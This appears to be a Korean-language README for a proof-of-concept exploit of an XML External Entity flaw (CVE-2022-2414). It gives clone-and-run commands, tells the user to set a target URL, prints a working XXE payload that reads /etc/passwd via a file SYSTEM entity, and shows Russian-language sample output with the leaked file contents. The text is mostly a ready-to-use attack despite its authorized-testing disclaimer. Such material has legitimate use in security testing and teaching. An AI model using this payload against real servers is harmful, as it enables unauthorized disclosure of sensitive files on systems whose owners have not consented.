
XML 외부 엔터티(XXE) 취약점 익스플로잇을 시연하기 위한 PoC 스크립트입니다.
GenXMLExternalEntityExploit는 XML External Entity (XXE) 취약점 악용을 시연하기 위한 PoC 스크립트입니다. 이 스크립트는 XML 페이로드를 사용하여 대상 서버에서 민감한 파일을 읽습니다. 보안 테스트, 침투 테스트 또는 교육 목적으로 유용할 수 있습니다.
git clone https://github.com/geniuszly/CVE-2022-2414
cd CVE-2022-2414
python3 GenXMLExternalEntityExploit.py
TARGET_URL 변수를 테스트하려는 대상 서버의 URL로 업데이트하십시오.XML_PAYLOAD 문자열을 사용자 정의하십시오.기본적으로 스크립트는 /etc/passwd 파일을 읽기 위해 다음 페이로드를 사용합니다:
<!--?xml version="1.0" ?-->
<!DOCTYPE xmlData [<!ENTITY fetchFile SYSTEM "file:///etc/passwd"> ]>
<CertEnrollmentRequest>
<Attributes/>
<ProfileID>&fetchFile;</ProfileID>
</CertEnrollmentRequest>
Инициализация отправки XML-пейлоада на сервер...
Статус-код ответа: 200
Содержимое XML-ответа:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nологin
...
이 도구는 교육 목적 및 승인된 보안 테스트만을 위한 것입니다. 저자는 이 도구의 불법 사용에 대해 책임을 지지 않습니다.